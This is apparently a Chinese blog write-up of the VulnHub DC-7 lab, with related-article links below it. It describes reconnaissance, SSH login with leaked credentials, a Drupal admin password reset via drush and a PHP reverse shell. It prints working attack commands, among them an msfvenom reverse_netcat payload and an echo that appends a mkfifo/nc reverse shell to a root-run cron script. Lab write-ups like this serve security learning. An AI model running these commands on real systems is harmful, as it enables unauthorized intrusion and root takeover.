DC系列(7)DC-7渗透测试

最新推荐文章于 2024-05-11 21:27:20 发布
最新推荐文章于 2024-05-11 21:27:20 发布
阅读量3k 收藏 2
点赞数
分类专栏: DC靶机 文章标签: 安全 linux
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_43577567/article/details/122452545
版权

DC-7

0x00 前期准备

DC-7官网:https://www.vulnhub.com/entry/dc-7,356
DC-7官wp:https://blog.mzfr.me/vulnhub-writeups/2019-08-31-DC7

  1. 官方提示:跟以前一个DC类似,但有新的概念包含其中,如果选择暴力破解和词典攻击,将不会成功。跳出框框思考。
    在这里插入图片描述

  2. 导入成功。
    在这里插入图片描述

0x01 社工破译

  1. nmap扫描:nmap 172.20.10.0/24,得到dc7地址172.20.10.6,开放80、22端口。
    在这里插入图片描述

  2. 访问网页,是Drupal网页,依然提示跳出盒子思考。

在这里插入图片描述
3. 左下角找到一个推特账户@DC7USER,科学地找到该用户主页,看到github连接,点进进入,看到有一个staffdb文件夹。
在这里插入图片描述

  1. 点进staffdb查看,在config.php中找到可疑用户名dc7user和密码MdR3xOgB7#dW。
    在这里插入图片描述

  2. 以防万一,下载压缩包并放入kali解压。
    在这里插入图片描述

  3. 直接在网页登陆无效,尝试使用密码MdR3xOgB7#dW进行ssh登陆:ssh dc7user@172.20.10.6。成功。
    在这里插入图片描述

0x02 drush修改密码

  1. ls查看,发现提示接收到新邮件。cat查看该目录,发现敏感字眼:root和backup.sh脚本。
    在这里插入图片描述

  2. 按照提示路径查看/opt/scripts/backups.sh,与drush和gpg指令相关。
    在这里插入图片描述

  3. drush是一个shell接口,用于从云服务器命令行管理Drupal。进入/var/www/html,执行:drush user-password admin --password="admin",修改admin用户密码为admin。

    drush参考:https://www.howtoing.com/a-beginner-s-guide-to-drush-the-drupal-shell

    在这里插入图片描述

  4. 修改成功后,回到网页用admin-admin登陆。
    在这里插入图片描述

0x03 手动安装PHP模块&小马回显

  1. 因为dc7的CMS是Drupal8,已经移除了PHP Filter,后续作为一个模组存在,可以手动安装。点击

    官方告知:https://www.drupal.org/node/2088811

    在这里插入图片描述

  2. 进入http://drupal.org/project/php,下载压缩包php-8.x-1.1.tar.gz并存入kali。
    在这里插入图片描述

  3. 回到kali网页,依次点击左上角的manager→extend→install new module,浏览选择刚才的压缩包。
    在这里插入图片描述

  4. install安装成功,点击next steps里的enable newly added modules激活php模块。
    在这里插入图片描述

  5. 点击蓝色三角收回前几栏,找到Filters-php filter,勾选后到页末选择
    在这里插入图片描述

  6. 安装成功。
    在这里插入图片描述

  7. 在Content中添加一句话木马,依次点击:content→add content→basic page,测试添加<?php phpinfo(); ?>,命名为info test。选择format为php code。
    在这里插入图片描述

  8. 回显php信息成功。
    在这里插入图片描述

  9. 写入之前提到的php-reverse-shell.php,修改ip和port。

    前文见:https://nikris.blog.csdn.net/article/details/122325464,0x02 反弹shell。

    在这里插入图片描述

  10. 在kali开启监听端口:nc -lvvp 7788,点击save,此时在终端反弹shell成功,切换shell外壳:python -c 'import pty;pty.spawn("/bin/bash")'
    在这里插入图片描述

0x04 bash脚本后门

  1. 回看之前ssh登录时找到的bash脚本权限:ls -l backups.sh。该脚本属于root和www-data用户组。
    在这里插入图片描述

  2. 在kali终端用msfvenom生成后门,对应端口8888:msfvenom -p cmd/unix/reverse_netcat lhost=172.20.10.3 lport=8888 R

    msfvenom参考:https://blog.csdn.net/qq_40549070/article/details/108895422

    在这里插入图片描述

  3. 复制在dc7终端的backups.sh写入后门:echo "mkfifo /tmp/eieioac; nc 172.20.10.3 8888 0</tmp/eieioac | /bin/sh >/tmp/eieioac 2>&1; rm /tmp/eieioac" >>backups.sh
    在这里插入图片描述

  4. 在kali开启监听8888端口:nc -lvvp 8888,耐心等待backups.sh这个定时任务执行(真的要等一会),反弹shell成功,查询用户为root。
    在这里插入图片描述

  5. 连续执行指令,进入/root目录找到theflag.txt,渗透成功。
    在这里插入图片描述

Nikris
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Vulnhub靶机渗透测试 DC-7靶机
12-07
Vulnhub靶机渗透测试 DC-7靶机
DC-7靶机渗透测试
读书 买花 长大
04-30 368
DC-7
DC-7靶机渗透测试详细教程
啊醒的博客
05-04 1072
DC-7靶机渗透测试详细教程
2024年网络安全最全【DC-7靶场渗透】(2),人生转折
最新发布
2401_84301389的博客
05-11 615
本期做一下DC7靶场。
dc-7 靶机渗透学习
..
03-23 3915
信息收集 扫描当前网段 nmap -sP 192.168.202.0/24 查看开启的端口服务 nmap -A -p- -v 192.168.202.146 访问靶机的80端口,通过Wappalyzer识别出是Drupal 8 先看一下靶机的说明 不是技术性的?跳出框框去思考?ememm,那先观看一下网站的特点吧。 对比新搭建的Drupal框架,发现在最下方多了一个@DC7USER。 去谷歌搜索一下@DC7USER,发现了一个Dc7...
靶机8 DC-7(过程超详细)
honest_gg的博客
09-26 1631
DC靶场一共有9个,对于学习渗透测试人员,有很大的帮助,是非常不错的靶场。
Vulnhub系列DC7靶场详解
weixin_50053818的博客
05-30 1080
文章目录环境信息收集安装插件拿shell提权 环境 vulhub系列DC7靶场 VMware虚拟机 kali 信息收集 由目标靶机的MAC地址得到目标IP为192.168.137.103,直接nmap扫描。 可以知道目标开放了80和22端口,直接进入网站。 进入网站发现CMS是drupal 8,在漏洞进行搜索,无果。所以只能查看网站。翻译一下首页的内容。 欢迎来到DC-7 DC-7引入了一些“新”概念,但我将让您弄清楚它们是什么。 ???? 尽管此挑战并不是技术性的全部,但如果您需要诉诸于暴力破
Vulnhub靶机渗透测试 DC-8靶机
12-07
Vulnhub靶机渗透测试 DC-8靶机
Vulnhub靶机渗透测试 DC-3靶机
12-07
Vulnhub靶机渗透测试 DC-3靶机
Vulnhub靶机渗透测试 DC-9靶机
12-07
Vulnhub靶机渗透测试 DC-9靶机
DC-4-Web渗透测试靶机
01-19
DC-4-Web渗透测试靶机】是一个专门为网络安全专业人士设计的模拟环境,主要用于学习和实践Web渗透测试技术。在Web渗透测试中,目标是识别并利用网站应用程序的安全漏洞,以便于预防或修复这些漏洞,保护真实的网络...
DC-7靶机攻略
真正的大师,永远都怀着一颗学徒的心。
08-07 831
前言 其他DC靶机攻略请查看我的其他文章。 一、DC-7的信息收集 DC-7靶机开启后,可以直接看到IP地址,我们直接nmap扫描查看一下目标开放的端口: 扫描后我们可以查看到目标开放了80与22端口,并且网站的框架采用了Drupal8(后面会有用) 访问80端口,进入网站后需要登陆 在github上DC-7给出了一个用户名与密码 可是并不能登陆 <?php $servername = "localhost"; $username = "dc7user"; $password = .
DC7_靶场实战
JSH_CDX的博客
03-30 1361
DC7_靶场实战 我只是知识的搬运工 希望看完这篇博文你能解决问题
DC-7靶机渗透
m0_62008601的博客
06-02 1036
dc-7靶机的渗透过程
DC-7靶场下载及渗透实战详细过程(DC靶场系列
金 帛的博客
08-08 2841
dc-7靶场详细渗透过程
Vulnhub DC-7
SopRomeo的博客
03-03 144
信息收集 扫ip和端口 nmap -A -sV -T4 -O -v 192.168.1.143 开放80和22端口 漏洞利用 Drupal8框架,我们可以发现这是Drupal8,以往都是7,说明之前的漏洞已经修复了 看到他的介绍 要我们以靶机为思路 搜下面的USER 发现推特账号 推特里有github 查看config.php dc7user/MdR3xOgB7#dW 网页登录失败,ssh登录成功 MySQL登录失败 查看mbox文件,里面有一些操作记录 发现有个备份的sh 发现这里
DC7打靶思路整理
W0ngk,一个安全菜鸡,一直在模仿,尚未有超越。
01-19 3141
风萧萧兮易水寒,壮士一去兮不复还。 —— 佚名《荆轲歌.渡易水歌》 一、信息收集 在不知道目标靶机的情况下,我们先来个主机发现,我们这里使用nmap来进行: 排除掉常用的那些IP,剩下了就是我们的靶机IP了,然后继续使用nmap进行端口扫描,发现只开放了SSH和http服务: 访问目标靶机的web服务,根据wappalyzer收集到的信息显示,目标系统使用的CMS是Drupal8: 二、外围打点 既然基本的信息收集已经有了,那就先上神器xray进行漏洞扫描但是除了扫描出几个文件来,其他毫无所获。 .
[网络安全学习篇75]:渗透测试实战-DC-7-靶机入侵
安全知识学习-该平台为唯一原作者平台,其他平台属冒名顶替,请勿相信上当受骗
05-25 1371
引言:我的系列博客[网络安全学习篇]上线了,小编也是初次创作博客,经验不足;对千峰网络信息安全开源的视频公开课程的学习整理的笔记整理的也比较粗糙,其实看到目录有300多集的时候,讲道理,有点怂了,所以我就想到了通过写博客(课程笔记)的形式去学习它,虽然写博客会让我多花几倍的时间去学习它,但是当我完成一篇博客所获得的成就感和你们对于我的认同感,让我很满足,能够鼓励我一天天的坚持下去,也希望和我一起学习本期视频的"同道"们也能给一直坚持下去。我们大家一起加油。由于作者本身也是网络信息安全小白,大部分知识点都是初
DC系列漏洞靶场-渗透测试学习复现(DC-4)
W983079520的博客
12-02 1218
DC-4是一个易受攻击的实验环境,最终目的是让攻击者获得root权限,并读取flag。 本篇文档中用到了exim4漏洞提权。 1 环境搭建 下载靶场文件,使用Vbox或者VM打开即可;攻击机使用kali-2020。 2 主机发现 使用Kali中的arp-scan工具扫描结果如下: 172.16.12.145为DC-4靶机的IP地址。 3 端口探测 探测使用nmap工具 端口扫描结果如下: 由扫描结果知开放端口有两个:22(SSH服务默认端口)和80(http默认端口)。 4 访
内网安全攻防实战:渗透测试与法规解析
"内网安全攻防渗透测试实战指南.pptx" 内网安全攻防是信息安全领域的一个重要部分,特别是在企业、政府机构和其他组织中,内网通常包含大量敏感数据和关键系统。渗透测试是对内网安全性进行评估的一种方法,目的是...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值